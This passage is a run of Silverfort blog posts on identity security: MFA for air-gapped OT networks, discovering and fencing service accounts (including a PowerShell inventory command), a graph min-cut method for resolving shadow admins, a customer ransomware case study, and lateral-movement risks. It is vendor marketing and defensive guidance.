IT network. A New Reality: Erosion of Isolation and Increased Attack Surface IT/OT Convergence and Third-party Access The landscape has shifted dramatically with the convergence of IT and OT environments. Third-party contractors and service providers require routine access to OT networks for maintenance and support, creating a bridge between air-gapped networks and external systems. Routine file transfers between OT and IT networks for operational data, configuration files, and software updates further weaken the isolation. The Active Directory SSO Shift The transition from local logins to Active Directory Single Sign-On (SSO) in OT networks has streamlined user access. However, it has also exposed a significant vulnerability. Once an attacker penetrates the network, the shift to centralized credentials makes lateral movement easier, escalating the potential damage from a breach. Leveraging Weaknesses for Ransomware Attacks With the weakening of air-gapped networks, adversaries can capitalize on these vulnerabilities to infiltrate the OT network and plant ransomware payloads on critical assets like engineering workstations, HMIs, and databases. Once inside, attackers can exploit the network's interconnectedness to rapidly spread the ransomware, leading to operational downtime, data loss, and significant financial losses. The Challenge of Traditional MFA for Air-Gapped Networks Dependency on Internet Connectivity Traditional Multi-Factor Authentication (MFA) solutions often rely on internet connectivity for verification, rendering them ineffective in air-gapped environments where constant network connection isn't guaranteed. This dependence on connectivity creates a gap in security. Agent Dependencies Traditional MFA solutions often necessitate the deployment of agents on devices, a task that's not always feasible in OT environments. The presence of legacy systems and concerns about device stability hinder the deployment of these agents, allowing attackers to exploit gaps. Silverfort MFA: Hardware Token MFA with no Agents Required The Silverfort Unified Identity Protection Platform offers a robust solution to address these challenges and secure air-gapped OT networks effectively: Direct Integration with Active Directory Silverfort's direct integration with Active Directory eliminates the need for agents or proxies, ensuring seamless authentication without compromising security. This approach simplifies the authentication process and enhances the overall security posture. Rule-based and Risk-based MFA for Secure Third-party Contractors Access Silverfort's MFA capabilities allow organizations to enforce rule-based and risk-based authentication for third-party contractors and service providers. This ensures that only authorized personnel can access the network and significantly reduces the attack surface. FIDO2 Token Support to Prevent Lateral Movement Silverfort's support for FIDO2 tokens adds an extra layer of protection against lateral movement within the OT network. By requiring strong authentication for every access attempt, even if an attacker gains initial access, their ability to move laterally and propagate ransomware is severely limited. Learn more on Silverfort protection for air-gapped networks here. Does that resonate with your needs? Click here to schedule a call with one of our experts. --- - Published: 2023-08-17 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/securing-service-accounts-with-silverfort/ Managing service accounts can be a daunting task for organizations, as service accounts are scattered across different environments and are used by various business applications, and are typically forgotten about unsupervised. Meaning in most organizations nobody is tracking their use or validating that they are not compromised or used by malicious actors. On top of managing these accounts, organizations often lack full visibility into service accounts and how they’re being used, and are seen as low-hanging fruit for threat actors. However, service account management is a critical task that should not be overlooked, as service accounts often have privileged access and are used by applications, scripts, and services to authenticate and interact with various systems and resources. If service account management is overlooked, it can lead to malicious actors with access to compromises service accounts carrying out malicious activities such as lateral movement. In this post, we will explain how Silverfort enables you to manage your service accounts easily, through automated detection, monitoring, and protection. As a result, Silverfort is able to provide full visibility, risk analysis, and adaptive access policies for service accounts without the need for password rotation. Best Practices for Service Accounts Protection While service accounts can be associated with an owner and these accounts' activities should be continuously monitored, they should not have the same privileges as a regular user account. This means that service accounts should not have interactive user interface privileges or the ability to operate as normal users. By implementing Silverfort’s Unified Identity Protection platform, organizations can apply best practices to get their management of service accounts under control. This involves a three-step approach: Discover all service accounts Monitor activity and risk analysis Analyze and enable access policies With these capabilities implemented, service account management is no longer a nightmare, and, at the same time, the risk of security breaches caused by mismanaged service accounts is dramatically reduced. Here are more details on Silverfort’s three-step approach: 1. Discovery The first step to properly managing and protecting all service accounts is knowing exactly where they reside. Here are several key questions to ask: What service accounts do you have? What is the total number of service accounts? Which assets use those service accounts? Silverfort’s Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, and account info This is done when an organization connects its domain controllers to Silverfort. Silverfort is then able to automatically identify all service accounts, providing complete visibility into their behavior patterns. This is because, as machine accounts, service accounts display predictable behavior patterns, allowing Silverfort to identify and categorize them automatically. Silverfort identifies and categories three main types of service accounts: • Machine to Machine (M2M) Accounts– defined on Active Directory (AD) or another user repository • Hybrid Accounts – used by both users and machines • Scanners – used by a few devices to communicate with a large number of resources inside a network Silverfort can also quickly identifies any accounts that follow usual service account naming conventions (e. g. “admin” or “svc”), as well as any custom naming conventions that may be used by the organization. Because Silverfort can detect all machine-like behavioral patterns, it can also flag whether an account is also being used by a human user and alert on this bad practice. Silverfort detects the erratic patterns associated with human user activities that do not correlate with the machine’s behavior patterns and alerts the irregular activity of the service account.   2. Monitoring & Risk Analysis The next and continuous phase is monitoring all service account activity and associated risks. Now that there is a complete picture with full visibility into all service account details and behavior, Silverfort constantly monitors and audits their use. Silverfort’s Investigation screen shows various insights into a specific service account's activity.   Silverfort can identify different configurations and behaviors of service accounts, such as high-level permissions, broad use, repetitive behavior, etc. Silverfort then adds risk analysis and level of predictability to each service account to enable administrators to better understand the degree to which specific service accounts are at risk. By continuously monitoring all authentication and access activity, Silverfort can assess the risk of every authentication attempt and thus immediately detect any suspicious behaviors or anomalies, providing SOC teams with actionable insights into overall service account activity. The importance of monitoring and auditing Active monitoring and auditing are crucial components of service account management. By keeping a close eye on the activities of these accounts, organizations can swiftly detect any suspicious behavior and take necessary action to prevent potential breaches. Active Monitoring and Anomaly Detection Active monitoring involves continuously tracking and analyzing the activities of service accounts to identify any deviations from normal behavior patterns. This could be an unusually high number of failed login attempts, modifications to account privileges, or changes in login locations or times. By setting up automated alert systems, organizations can be notified of such anomalies in real-time, enabling them to respond promptly to potential threats. Auditing and Authentication Monitoring The purpose of auditing is to ensure compliance with organizational policies and regulatory requirements by conducting periodic reviews of service account activities. Authentication monitoring, on the other hand, focuses on verifying the identities of the users attempting to access service accounts. Both these measures help in maintaining accountability and enhancing the overall security of service accounts. Visibility and Auditing Challenges Managing service accounts comes with numerous visibility and auditing challenges. Without proper tools and processes in place, it can be difficult to keep track of all service accounts within an organization, especially in large-scale environments with hundreds or even thousands of accounts. Dormant and Forgotten Service Accounts One common issue is the existence of dormant or forgotten service accounts. These are accounts that have been created for a particular purpose but are no longer in use, either because the project they were associated with has ended, or the employee who created them has left the organization. These dormant accounts can pose a serious security risk as they could be exploited by malicious actors to gain unauthorized access to the system. Therefore, it's important to regularly audit service accounts and deactivate any that are no longer needed. Sharing of Service Account Credentials While this may seem convenient to share the credentials, it significantly increases the risk of a security breach. If the credentials are compromised, all services using those credentials become vulnerable. To mitigate this risk, each service should have its own dedicated service account with unique credentials. 3. Analyze & Access Policies Once full visibility and insight into all service accounts are achieved, the next phase is to analyze these insights and create access policies to provide a digital fence for these non-human accounts. Silverfort displays a list of sources and destinations using the service accounts, as well as the number of hits (authentications) Silverfort enables admins to analyze their service accounts' insights to identify certain service account behaviors. Silverfort shows the number of hits per source and destination. This helps admins prioritize the different sources and destinations that their service accounts connect to, ensuring they are properly monitored and protected. After analyzing the service accounts, Silverfort automatically recommends specifically tailored policies for each service account. Each security policy is formulated to lower the network risk level without blocking the traffic and tracking policy violations. This is focused on monitoring the traffic and allows the admin to make sure that the created policy is full without impacting the traffic. Silverfort has three types of authentication policies for service accounts: Block access Alert to SIEM Alert For each policy created with Silverfort, administrators can choose sources, destinations, authentication protocols, when policies should be applied, and what actions the system should take in case of a deviation. In the case of an organization with a large number of service accounts, Silverfort allows admins to create general policies that can be assigned to multiple service accounts. This can be done by using Silverfort’s recommended policies. Once policies have been created for all service accounts with Silverfort, admins can simply enable and automatically enforce these policies without the need to make any changes to applications, change passwords, or make use of any proxies. With complete visibility into these accounts and the ability to proactively protect service accounts with access policies ,organizations will now be well-equipped to reduce their attack surface area from compromised service accounts. Learn More About Silverfort's Service Account Protection The alarming reality of service account compromises cannot be ignored, as they continue to occur regularly and have been instrumental in major, high-profile cyberattacks. These incidents serve as stark reminders of the critical importance of securing service accounts and implementing robust protective measures. The compromised service accounts have emerged as a preferred target for malicious actors due to their elevated privileges and widespread access within organizations. These accounts often hold the keys to the kingdom, granting unauthorized malicious actors entry to sensitive data, critical systems, and confidential resources. To address this organizations must prioritize the implementation of the service accounts security best practices such as strong authentication, regular monitoring, and deploying strict access policies. By prioritizing service account security, organizations can mitigate the risk of compromised service accounts being deployed by malicious actors in cyber attacks. Interested in seeing how Silverfort can help you to discover, monitor, and protect service accounts? Request a demo here. --- - Published: 2023-08-08 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/list-all-service-accounts-in-domain/ Maintaining control and visibility over service accounts is crucial for any organization's identity security posture management. These privileged accounts are often created to automate system functions and then forgotten, creating security holes that can be exploited. Not knowing the full scope of the service accounts and their activity on your network and servers leaves gaps that cybercriminals actively target. This article provides a step-by-step guide for cybersecurity professionals to gain a complete inventory of service accounts across their Active Directory domain and Windows servers. The lack of documentation of service accounts presents a major weakness, and this process will contribute to the closure of that gap by creating a full accounting of accounts with privileged access. Properly managing and monitoring service accounts is a key way to strengthen defenses and avoid becoming the next headline. How to Generate a List of All Service Accounts in Your Domain To get a complete inventory of service accounts in your domain, you need to query your domain controllers. Service accounts are used by Windows services, IIS application pools, SQL Server, and other applications to access resources. However, without proper documentation and oversight, orphaned service accounts can pose a security risk. Generate a list of all domain service accounts by running the following PowerShell command on a domain controller: Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties SamAccountName,ServicePrincipalName | Select-Object SamAccountName,ServicePrincipalName | Export-CSV C:\Temp\ServiceAccounts. csv This will: Use the Get-ADUser cmdlet to retrieve all Active Directory user accounts Filter the results to only return users that have a ServicePrincipalName attribute (which indicates it is a service account) Export the SamAccountName and ServicePrincipalName properties to a CSV file called ServiceAccounts. csv Open the CSV file to view the list of service accounts. The SamAccountName indicates the account name, and ServicePrincipalName shows the name of the service or application that uses the account. Review each service account to determine whether it is still in use. Check with application owners to verify the account is still required. Disable or delete any unused service accounts to reduce the risk of compromise. Document all active service accounts, including details about the owning application or service. Establish a process to review service accounts regularly to ensure the documentation stays up to date. Taking the time to find all service accounts in your domain and implement oversight procedures is an important part of an overall security strategy. Undocumented and abandoned service accounts provide easy access that can be exploited by malicious actors. Maintaining an accurate register of all service accounts allows you to properly manage and monitor them. Verifying Service Accounts and Their Permissions Once service accounts have been identified, it is important to verify that their permissions are properly scoped. Overly permissive service accounts represent a major security risk, as they can be leveraged by malicious actors to gain broad access within the network environment. Reviewing Service Account Permissions The first step in verifying service account permissions is to determine what level of access each account has been granted. This includes: Reviewing group memberships. Service accounts should only belong to groups that are directly relevant to their function. Accounts belonging to overly permissive groups like “Domain Admins” should be scrutinized. Analyzing NTFS file/folder permissions. Service accounts should only have permissions on files and folders that are essential to their intended use. Full control or modify permissions on sensitive directories are red flags. Checking for privileged account types. Accounts with administrative privileges like “Enterprise Admins” or “Schema Admins” require close review. These highly privileged accounts are frequent targets of compromise. Reviewing delegation rights. Service accounts should not have “Act as part of the operating system” or “Impersonate a client after authentication” permissions, as these can be used to gain elevated access. Analyzing SQL Server, SharePoint and other application permissions. Service accounts with db_owner or farm admin roles have broad access and should be closely reviewed. Only the minimum permissions required for the account’s function should be granted. For any overly permissive service accounts identified, permissions should be reduced to the appropriate level required for the account to operate. If the business justification for an account’s broad access is unclear, it may indicate the presence of an unauthorized or “shadow” account that should be disabled. Rigorously verifying and reducing service account permissions is a key step in limiting the potential impact of account compromise. By following best practices for service account permission scoping and least privilege, organizations can significantly reduce risks related to service account access. Ongoing Monitoring and Management of Service Accounts Regular monitoring and management of service accounts are crucial for maintaining security and compliance. Once the initial audit of service accounts is complete, ongoing review processes must be implemented to ensure no accounts are overlooked or misused. Scheduled Reviews It is recommended that service accounts be reviewed on a quarterly basis at a minimum. During reviews, check that account passwords are complex and unique, unused accounts are disabled or deleted, and that account permissions and access rights are appropriate and necessary for the account function. Multi-factor authentication should be enabled on all service accounts to provide an extra layer of protection. Monitoring Account Usage Continuously monitor service account activity and login events. Watch for anomalies like logins from unknown devices or locations, logins during unusual hours, or elevated account permissions. Monitor for signs that a service account may have been compromised like installation of unknown software or configuration changes. Alerts and reports can be configured to notify administrators of questionable account activity requiring review. Documentation Well-documented service accounts are easier to properly manage and audit. Documentation should include details like the account purpose, ownership, permissions, devices, and software accessed. Documentation makes it simpler to determine if any account changes were legitimate and authorized. Lack of documentation hampers the ability to thoroughly review service accounts and can increase security risks. Account Ownership Ensure that all service accounts have a designated owner, even for automated processes. Account owners should review access and usage regularly to verify accounts are still required and being utilized properly. Unowned or orphaned accounts are more prone to abuse or neglect since no one claims responsibility for managing them. With routine attention and oversight, service accounts can be secured and compliance maintained. But without ongoing monitoring and management, the hard work of the initial account audit will be quickly undone as security holes develop and access rights spiral out of control. Establishing a regular schedule to review accounts, monitor activity, update documentation and verify ownership is key. The Importance of Knowing All Your Service Accounts Service accounts are administrative accounts used by Windows services, IIS application pools, and scheduled tasks to access resources. Because service accounts often have elevated privileges, they are a common attack vector for hackers and malicious insiders. Not knowing all the service accounts in your domain and which resources they access leaves your organization vulnerable to unauthorized access and data breaches. Regular service account audits are a proactive security measure required to ensure compliance with regulations like PCI DSS and to minimize your attack surface. Service accounts provide a way into your network. Hackers frequently target service accounts with weak passwords or excessive privileges to gain initial access. Once inside, they use the account to access data and move laterally. Orphaned service accounts are vulnerable. Service accounts no longer associated with a service or task but still active in AD can be targeted for hackers. It's critical to identify and disable orphaned accounts. Privilege creep can happen over time. Service accounts may accumulate additional access rights as new services and systems come online, granting the accounts more privileges than they actually need. Audits help prevent privilege creep by ensuring accounts have the least privilege access. Compliance at risk. Regulations like PCI DSS require strict control and monitoring of administrative accounts like service accounts. Failure to audit service accounts regularly puts your compliance at risk and can result in penalties. The Risks of Not Having a Full Service Account Inventory Having an incomplete inventory of service accounts in your Active Directory environment poses serious risks to your organization. Unauthorized access to service accounts can result in privilege escalation, allowing malicious actors to gain administrative rights and access sensitive information. As a result, data breaches, service interruptions, and compliance issues may occur. Service accounts are often overlooked in audits and security reviews since they are non-human accounts. Yet they often have the elevated privileges required to run applications and services. In the event that these accounts are compromised, adversaries will have an easier time moving laterally within the network and gaining administrative access. When service accounts with broad access are compromised, data breaches are more likely to occur. When an attacker gains access to a system, sensitive information can be accessed and exfiltrated, including customer data, intellectual property, and financial records. Regulatory compliance is also put at risk if auditors discover unknown service accounts with excessive privileges. When service accounts are misused to tamper with applications, servers, and network devices, outages and disruptions can occur. Malware or ransomware deployed via a compromised service account can cripple systems and impact business operations. Performing a comprehensive inventory of service accounts allows organizations to implement appropriate controls, thus reducing the risk of unauthorized access, privilege escalation, data breaches, and service disruptions. Continuous monitoring and review of service accounts should be incorporated into any Active Directory security program. Failure to do so provides easy targets for malicious actors to exploit. How Silverfort Finds and Protects All Service Accounts Silverfort understands the importance of knowing and managing all service accounts. Our comprehensive solution creates a complete inventory, ensuring enhanced security and compliance. Our solution proactively identifies and protects service accounts, mitigating risks from unauthorized access and privilege escalation. We go beyond audits to address non-human accounts. Silverfort effectively manages elevated privileges required by service accounts. Regular monitoring and review significantly reduce data breaches, disruptions, and compliance issues. Through continuous monitoring and control, we detect and respond to threats swiftly. Silverfort not only prevents unauthorized access but also prevents lateral movement, ensuring malicious actors cannot gain administrative access. We understand the high stakes of security and compliance, so our solution eliminates easy targets while strengthening your Active Directory security program and staying ahead of threats. --- - Published: 2023-08-03 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/resolving-shadow-admins-achieving-maximum-impact-with-minimal-effort/ Shadow Admins are non-administrative users that hold sensitive privileges which effectively grant them admin-level rights. Such privileges can include direct access to resources or the ability to modify other users' settings (for example, resetting passwords, gaining “Write All properties” permissions, etc. ). In this blog post, we’ll focus on the second type. There are several reasons why shadow admin accounts are created: human error, mismanagement, a temporary need, or by an attacker who has managed to gain access and wants to hide their presence. Shadow admins are a known risk for almost every Identity Provider (IdP), including Microsoft Active Directory (AD), Microsoft Entra ID (formerly Azure AD), and Okta, among others. Here, we will discuss shadow admins within AD. Identity teams continuously search for shadow admin accounts in order to revoke their admin privileges. But this process is often lengthy and tedious, especially if an organization has a large number of shadow admins. My team and I were curious about the common permission configurations that could cause a user to become a shadow admin, as well as the best ways to identify and mitigate them. In this blogpost, we’ll use algorithmic tools and graph theory to present a novel method to reveal shadow admins within an organization, analyze them, and resolve them. Understanding the Threat of Shadow Admins A user account becomes a shadow admin if it has strong privileges over an existing admin account. Similarly, any other account with strong privileges over the shadow admin’s, also becomes a shadow admin. For example, if Alice had a regular account with admin permissions, she would be a shadow admin. If Bob gained strong permissions over Alice’s, he would also become a shadow admin. This chain of permissions causes a lot of complications, and reality shows that many shadow admins actually have more than one way to make themselves admins. What makes shadow admin accounts both challenging and risky is that they are not monitored or supervised, and their activity can potentially go undetected. Interested in learning more about shadow admins and how they threaten your organization? Read this blog post: https://www. silverfort. com/blog/the-hidden-dangers-of-shadow-admins/ So, to resolve the risk of shadow admins we need to revoke some of their excessive permissions, which takes time and effort. Therefore, it makes sense that any organization with many shadow admins would aim to resolve the maximum number of shadow admins with the least amount of effort (i. e. , organizational permissions changes). To do this efficiently, we can retrieve information regarding the permissions of users and groups in a selected set of modification permissions and monitor them. Using logs, we are then able to construct chains of permissions and get details on the shadow admins in the organization. Translating the Issue In any organization with shadow admins, there are multiple permission chains that create a connective path between users and the administrative accounts they could potentially take over. The goal we’ve set for the organization is to make as few changes to permissions as possible, while resolving a large portion of its shadow admins. The question, therefore, is: what permissions are those? So, let’s rephrase the problem: Identify the optimal set of K permissions that, if revoked, would mitigate the maximum number of shadow admins. Now that we have this definition, we can convert the problem to a visual one using graph theory. We do this by representing every account or group as a node in a graph and every permission as a directed edge between these nodes. This enables all our permission chains to be displayed and connected on a single graph along with their respective privileges and attributes. Using the information contained in the permission chains, we can identify who the organizations' admins and administrative groups are, and mark those in our graph, as they are the end goal of a shadow admin. At this stage, such a graph would look like this: Note: Edges are permissions between entities. Their direction is who they hold permission over. Red nodes are admin/administrative groups; brown nodes are user groups; gray nodes are single users. Next, we will rewrite the problem statement one more time: Find the set of K edges that, upon removal, would disconnect as many shadow admins as possible from the rest of the graph (i. e. , mitigate them). Breaking Apart the Approach At first glance, we see a Directed Acyclic Graph (DAG) that represents a network connecting our various permission chains. But let's think about the representation of the graph and connections, as well as how each entity can hold permission over another. In a way, we can imagine a shadow admin “moving” in our graph from one node to another on its edges. Perhaps even more than one single shadow admin could be capable of such movement. Now let’s imagine that all shadow admins in the organization start moving towards our red nodes (the admins), then on each path a certain number of shadow admins are “flowing” towards their end goal. Let’s also note that it doesn’t matter if multiple shadow admins are flowing towards a single node on their path or that the node is a single account. This is because once all shadow admins reach that point only a single account can continue the path. This, by the way, is reminiscent of the famous “Flow Problem,” a scenario in fluid dynamics where we have a system in which liquid runs through pipes from a few source nodes to a few destination nodes. So, let’s now turn our eyes to a theorem called “Minimum Cut–Maximal Flow. " This states that the maximum amount of flow in a system passing from the source nodes to the destination nodes is equal to the total weight of the edges in a minimal cut. We’ll define the following: Flow capacity of an edge — for every edge there is an upper limit to the flow passing through it. Conservation of flow — incoming flow to a node must be equal to the outgoing flow. Cut — the partition of nodes such that it splits the network into two parts:a cut cannot contain both the source and the sink nodes. the weight of a cut is equal to the sum of capacity of outgoing edges. The algorithm’s goal is to find the maximum flow in a network from a source node to a sink node while minimizing the capacity of the cut separating them. The algorithm iteratively augments the flow along paths from the source to the sink until no more augmenting paths can be found. Solving the Flow Problem using this theorem gives us a minimal-cut solution that is equivalent to identifying the set of K edges to remove — since the duality problem is the maximal flow possible through the system, meaning that we are finding a cut that minimizes the weight of the cut while maximizing the partition. The resulting graph where the algorithm will be applied will look something like this: Green node is the dummy source and green edges are connections to admins/administrative groups. Blue node is the dummy sink and blue edges are connections to leaf nodes. Results and Conclusions Applying our method to a group of more than 30 organizations, we discovered that the median was around 30 active accounts per organization identified as shadow admins, with a few organizations having as many as 1,000 such accounts. Applying the algorithm resulted in a minimal cut of a set of edges that, if removed, would mitigate most shadow admins with minimal changes to the organization's permissions. The results look like this: Yellow nodes are part of the minimal cut that is recommended to be resolved, resolving the permission of the red edges on the graph will negate all yellow shadow admins. On average, we managed to resolve around 70% of an organization’s shadow admins with a single iteration of the algorithm. Furthermore, all that was needed to achieve that was the revoking of three permissions on average! This means that we can provide the exact set of edges (i. e. , permissions) that the organization should consider revoking that would net the best mitigation of shadow admins with minimal effort. Closing Thoughts Shadow admins are a serious threat that is often overlooked, and one not easily mitigated by traditional methods. Having a chain of privileges that leads to a domain admin isn’t always well documented. One of the common patterns we noticed was that, in reality, there are multiple ways for a user to become a shadow admin. A different approach was much simpler to implement, but it couldn’t tackle such patterns and returned sub-optimal results. Our solution monitors the permissions given in an IdP environment and can dynamically build the best set of privileges to resolve in order to reduce the number of shadow admins with minimal action. A method like this can help pinpoint the set of optimal permissions to be resolved with minimal effort, taking a real problem from the cybersecurity domain and visualizing it by utilizing a known algorithm to reach a solution. --- - Published: 2023-07-25 - Modified: 2025-04-14 - URL: https://www.silverfort.com/blog/cyber-insurance-can-actually-stop-ransomware-attacks/ Qualifying for a cyber insurance policy is just one more checkbox that security teams are required to tick. We've heard this statement over and over. For most organizations, this is the main reason to purchase cyber insurance. While this mindset is not entirely without grounds. It turns out that by implementing the identity protection controls that insurers are now requiring, it significantly increases the resilience to ransomware attacks to the point of blocking lateral movement attempts altogether. In this blog post, we’ll recap how Optix, a market leader in the optics IT software industry has implemented Silverfort’s service account protection for the sole purpose of meeting its insurer’s requirements, and how, Silverfort’s protection enabled it to block and fully mitigate a lateral movement attack. Why Do Insurers Care So Much About Service Accounts’ Visibility and Protection? The need for complying with cyber insurance requirements has surged by 50% in 2022 due to the increase in ransomware attacks. The insurance industry has responded by revising its cyber insurance policies to provide much more specific requirements regarding security controls to ensure that organizations are protecting their resources while being cyber-resilient to incoming attacks. Insurance companies have recently focused their attention on the non-human service accounts that are used for machine-to-machine communication to run various processes related to software maintenance, scanning, and management. As a result of their low visibility and the fact that they are generally excluded from password rotation and MFA protection, these accounts are frequently targeted. Several policies require companies to maintain regular inventories of these accounts and demonstrate an ability to monitor their activities as well as gain insight into their privilege levels, sources, and destinations. The underlying logic of this requirement is that since adversaries would prefer to use these accounts for lateral movement and ransomware spread. By closely monitoring their access attempts, it would reveal an anomalous use that indicates a compromise. Even though many organizations find these requirements hard to implement due to configuring policies to monitor all service account behavior is a very time-consuming process that consumes a tremendous amount of IT resources, their impact on resilience to ransomware attacks is significant. How Silverfort Enables Organizations to Prevent Ransomware Attacks Silverfort’s Unified Identity Protection platform addresses all service accounts related requirements that insurers require for the renewal or purchase of a ransomware cyber insurance policy. Silverfort’s visibility into every authentication request enables it to automatically discover every service account in the environment since those accounts display highly predictable behavior. This allows organizations to easily conduct inventories of these privileged non-human accounts and create policies to block access or send alerts in case of any abnormal access attempt, preventing threat actors from using them in ransomware attacks. Partnering with Silverfort enables organizations to meet service account requirements, to qualify for a cyber insurance policy. Moreover – as we’ll now demonstrate – it would go beyond that and empower these organizations’ security teams to prevent any ransomware-related lateral movement attempt. Preventing a Ransomware Attack by Complying with Service Account Requirements Optix's sole reason to deploy Silverfort was to comply with their insurer's requirements so they could renew their cyber insurance policy. In May 2023, Silverfort customer Optix was targeted by a ransomware attack via their service accounts. However, shortly after working with Silverfort, they were targeted by a malicious actor who was trying to move laterally across their network using the compromised credentials of an Optix service account. The Attack Flow: Delivery: The attacker targets and sends a malicious link to an Optix employee on LinkedIn Initial access: The Optix employee clicked a malicious link enabling the attacker to gain access to their machine. Credential compromise: From its initial foothold in the machine the attacker achieved to compromise the credentials of two service accounts. Lateral movement: With these accounts, the attacker began to move laterally across Optix’s network. The Protection Flow: In Silverfort’s console, the security team could see the two service accounts accessing machines they have never accessed before. The security team immediately reset the passwords of the accounts blocking the lateral movement immediately. Following that, the team used Silverfort to track down the authentication trail of the accounts to the patient zero machine to conclude remediation and remove the remaining malicious presence. This example illustrates the importance of having a full identity protection solution in place, not just to comply with new cyber insurance requirements but to prevent attacks by threat actors using compromised credentials. To learn more about this attempted attack and how Silverfort helps organizations to comply with cyber insurance requirements, download this customer success case study here. --- - Published: 2023-07-19 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/why-ransomware-has-become-a-major-identity-threat/ Ransomware continues to plague organizations around the world, with more than 493. 3 million attacks detected in 2022. Despite a proliferation of products in the security stack, companies keep falling victim to these attacks, paying an average of $812,360 in ransom demands. And the total cost to an organization is estimated be $4. 5 million, due to the length of time involved in detecting and remediating these breaches. This article explores why ransomware attacks have increased so dramatically, how identity protection blind spots play a fundamental role in these attacks, and what organizations can do to address those blind spots and stop ransomware altogether. How Ransomware Evolved into a Critical Business Risk While ransomware is hardly a new phenomenon – the first recorded attack dates back to 1989 – it is only in the last few years that it’s become such a worldwide crisis. This is because attackers have evolved their techniques at a much faster pace than organizations can keep up. Up until about ten years ago, for example, threat actors only had the ability to infect a single machine at a time with ransomware. This was a disaster for the user as well as an issue for the security team, but ultimately did not represent an organizational risk. But with the appearance of several now-infamous cyberattacks in 2017 (including WannaCry and NotPetya), cybercriminals showed that they could couple an encryption payload with an automated propagation mechanism. This meant attackers were now using a new technique that allowed them to move across an environment and thus attack not just one machine at a time but infect an entire organization at once. A recent high-profile example of this was the Colonial Pipeline attack in May of 2021, which shut down a key fuel artery on the US East Coast leading to fuel shortages and the declaration of an emergency by the president. That year, in fact, attacks were up 78% from 2020 with 66% of all global organizations being affected by ransomware. The Impact of Ransomware is Amplified by Lateral Movement To appreciate why these attacks have become so widespread – and so successful – it’s important to understand the concept of lateral movement. According to the MITRE corporation, lateral movement is defined as a series of techniques that adversaries use to expand their presence in an environment following an initial compromise. This ability to conduct lateral movement has fueled today’s insatiable appetite for ransomware, since a single point of compromise can now yield a potentially huge payoff for attackers. In fact, lateral movement is now being used in 82% of all ransomware attacks. This is a disturbing development, since only a few years ago this ability was confined to highly sophisticated cybercriminals, such as state-sponsored hacking groups and foreign intelligence agencies. So let’s take a closer look at what’s actually going on here. Lateral Movement Attacks Are Fueled by Compromised Credentials According to some estimates, there are 24. 6 billion stolen credentials (i. e. username-password combinations) available for sale on the Dark Web. This represents a treasure trove for opportunistic threat actors looking to engage in ransomware extortion. Because with these credentials in hand, attackers know that by using tried-and-true techniques like phishing, smishing, or social engineering they can eventually get initial access to an organization’s environment and then run rampant. The reason is because of a fundamental flaw in the identity infrastructure itself. Once attackers gain access to an initial machine, they need only to present the compromised credentials to the identity provider responsible for user authentication – most likely Microsoft Active Directory (AD), which is used by 90% of the Global Fortune 1000 – and the lateral movement can begin. This is why lateral movement is such a serious identity threat, because of the availability of stolen user credentials as well as attackers’ ability to extract credentials from compromised machines or by intercepting network traffic, all of which enable cybercriminals to authenticate to multiple machines in an environment, spread a ransomware payload across an entire network, and encrypt multiple machines simultaneously. Ransomware Attacks Are Increasing Because of Two Blind Spots This brings us to an important point, because the security measure known as multifactor authentication (MFA) is known to be able to prevent 99. 9% of all cyberattacks. Yet if this is case, why are these ransomware attacks continuing unabated? The reasons are alarmingly simple. MFA Can’t Be Enforced EverywhereWhile MFA is available for SaaS applications, cloud workloads, and VPN access it can’t be enforced on common command-line access tools such as PsExec, PowerShell, and WMI. This is because the authentication protocols that AD uses – specifically Kerberos and NTLM – do not support MFA. These command-line tools are used regularly by network admins to gain remote access to machines across their network, but they’re also used by cybercriminals who know they can leverage them for lateral movement using stolen credentials without being impeded by MFA. This is a critical blind spot. Protecting Service Accounts is a ChallengeThe second blind spot has to do with non-human service accounts (also known as bots), which are machine-to-machine accounts used to automatically perform important functions in a network environment, such as updating software and conducting scans like health checks. The problem is that most organizations don’t know how many of these accounts they have or what each of them are doing (i. e. , which sources and destinations the various service accounts are authenticating to). The reason is because there is no diagnostic tool that can discover all of these accounts in an environment, which is alarming since many organizations have thousands of them. Scarier still is the fact that attackers relentlessly seek to compromise service accounts, which often have high privileges, so that they can conduct lateral movement virtually undetected and thus access multiple machines and systems easily. Many organizations have in place a Privileged Access Management (PAM) solution to keep user accounts secure, but there are limitations when it comes to service accounts. This is because service account access is usually performed by executing scripts in which their credentials are hard-coded. That means these passwords can’t be rotated automatically by a PAM without causing problems (e. g. , a service account no longer able to log in to its destination machine thus causing a critical process to break). How Silverfort Addresses Security Blind Spots To Stop Ransomware The Silverfort Unified Identity Protection platform was created to address these blind spots. By focusing on the place where user authentication takes place (i. e. , within the identity provider), Silverfort can extend the real-time prevention of identity threats to all resources and prevent the spread of ransomware. The way it works is that AD forwards all authentications and access attempts to Silverfort for a “second opinion” before any access decision is made. Once Silverfort receives the request, it analyzes it against its risk engine and configured policies to determine whether an additional security verification – specifically MFA – is needed. That means Silverfort is effectively protocol agnostic: As long as a user is authenticating to AD, that request can be analyzed and evaluated whether the protocol used is Kerberos, NTLM, or LDAP. The result is that Silverfort can enforce MFA on any resource (either through its own service or via integrations with any MFA provider) including the command-line interfaces that attackers constantly use for lateral movement. This addresses the first blind spot that leads to ransomware spread. Silverfort can also discover and protect all service accounts. Because the platform can see all authentications and access requests, it can quickly identify any accounts that display repetitive, machine-line behavior and label them as service accounts. Furthermore, Silverfort can provide “virtual fencing” for these accounts by allowing them to connect only to certain specified machines, triggering MFA (or even blocking access) if these accounts display behavior that deviates from their normal activity. This means any attacker who has compromised a service account would be stopped from performing lateral movement. All of this is done by configuring specific access policies in the Silverfort platform, which is an easy and intuitive process. Policies to enforce MFA on hard-to-protect resources like command-line access, file shares, and legacy applications can be put in place immediately, and many organizations find they’re able to discover and protect all service accounts within weeks and without any business disruption. Contact us today for a demo and see how Silverfort can help your organization stop ransomware. --- - Published: 2023-07-13 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/resolving-the-identity-protection-gaps-in-apra-resilience-assessments-findings/ The Australian Prudential Regulation Authority (APRA) recently published findings from a study examining the level of cybersecurity resilience of its regulated entities, which revealed an alarming number of security gaps. In this blog we take a look at the identity protection aspects of these gaps, and discuss how identity and security teams can assess their identity security posture within the context of APRA’s findings then subsequently take action to address their own resilience to identity threats. Every APRA-detected gap is 